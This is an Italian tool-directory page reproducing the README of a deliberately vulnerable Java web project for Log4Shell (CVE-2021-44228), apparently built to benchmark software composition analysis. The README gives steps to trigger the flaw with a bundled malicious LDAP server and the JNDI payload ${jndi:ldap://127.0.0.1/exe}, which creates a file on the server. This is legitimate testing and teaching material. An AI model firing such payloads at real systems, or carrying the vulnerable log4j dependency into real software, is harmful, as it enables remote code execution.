Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
l4j-tp1 — progetto web JEE con vulnerabilità log4shell (CVE-2021-44228) | Kitploit
Strumenti/GitHubGitHub/scabench/l4j-tp1
Analisi delle VulnerabilitàExploitSicurezza WebSicurezza della Supply ChainApprendimento e FormazioneLab e Pratica
GitHubscabench/l4j-tp1

l4j-tp1

progetto web JEE con vulnerabilità log4shell (CVE-2021-44228)

Vedi Repository
52 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4shell vero positivo

Questo è un semplice progetto web con una vulnerabilità log4shell. Il progetto definisce un semplice servizio GET scabench.HelloWorldService che restituisce una stringa di testo semplice hello world. Il servizio non prevede parametri e, se vengono rilevati parametri, viene registrato un errore.

La dipendenza vulnerabile è org.apache.logging.log4j:log4j-core:2.14.1, la vulnerabilità è CVE-2021-44228.

Dimostrare la vulnerabilità utilizzando un test

Questo richiede Unix o macOS. È facile portare questo progetto su Windows.

Viene fornito un test unitario per dimostrare la vulnerabilità. Il test richiede un server LDAP che fornisce codice vulnerabile; l'eseguibile corrispondente è fornito dal progetto ed è definito in un progetto separato https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept basato su https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept. Il test fixture gestirà l'avvio e l'arresto del server LDAP.

Il test creerà un file foo basato su un comando codificato e incorporato nel codice del server LDAP a cui log4j si connette (touch foo). Questo server può essere controllato da un attaccante.

Scarica lo strumento

Per eseguire il test, compila il progetto con mvn test.

Dimostrare la vulnerabilità eseguendo l'applicazione

  1. avvia il server web integrato: mvn jetty:run
  2. avvia il server LDAP incluso: java -jar dodgy-ldap-server.jar (il codice vulnerabile scaricherà codice Java da questo server)
  3. punta il browser su http://localhost:8080/, questo sito contiene un modulo precompilato con un payload dannoso ${jndi:ldap://127.0.0.1/exe}
  4. invia questo modulo
  5. questo creerà un file foo sul server

Eseguire analisi di composizione del software

Ci sono diversi script sh per eseguire diverse analisi; i report dei risultati si trovano in scan-results.

Generare l'SBOM

Il pom.xml ha un plugin per generare un SBOM in formato CycloneDX. Per fare ciò, esegui mvn cyclonedx:makePackageBom; l'SBOM si trova in target/ nei formati json e xml.